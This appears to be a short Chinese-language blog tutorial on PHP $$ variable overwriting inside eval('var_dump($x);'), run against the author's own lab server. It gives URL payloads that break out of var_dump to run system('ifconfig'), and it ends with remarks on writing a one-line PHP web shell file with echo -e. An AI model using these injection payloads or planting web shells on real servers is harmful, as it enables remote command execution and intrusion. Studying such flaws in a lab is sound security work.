php中$$变量覆盖问题

一个小的知识点。。。

这里主要是一个关于$$变量覆盖问题和eval("var_dump($x);");中绕过var_dump造成命令执行漏洞的分析

 

我将PHP代码写在test.php文件里了

root@kali:/var/www/html# vi test.php

代码内容：

可以发现这里$$x实际就是一个变量覆盖问题，而$x变量又是我们可控的，所以就可以var_dump一些我们想打印的东西，例如payload:

http://192.168.43.242/test.php?x=x=abc

但是现在我想用eval执行一些系统命令，因为有var_dump()，所以我们需要绕过这个函数，执行其他函数，比如:exec()、passthru()、system()、 shell_exec()这些函数能够执行系统命令

 

利用一:

payload： x=x=1);system("ifconfig"

http://192.168.43.242/test.php?x=x=1);system("ifconfig"

就可以绕过var_dump，执行system系统命令：

 

这个payload在代码中的呈现形式： 

eval("var_dump(1);system("ifconfig");");

; 执行将两条命令分割，均可执行，所以绕过了

 

利用二:

也可以直接在var_dump()函数当中执行执行系统命令 payload：    x=x=system("ifconfig")

http://192.168.43.242/test.php?x=x=system("ifconfig")

在代码中的呈现形式：

eval("var_dump(system("ifconfig"));");

eval执行里面的代码，var_dump()打印出system()执行的结果

 

最后再说一个关于在linux系统中写一句话木马中可能会遇到的问题吧：：

root@kali:/var/www/html# echo "" > mm.php

向这样直接向服务器中写入木马时，它的内容会是这样：

$_POST不见了，原因是在shell编程中，" " 中的 $xx 会被当做一个变量，所以这里需要用 -e 参数 转义

root@kali:/var/www/html# echo -e "" > mm.php

结果：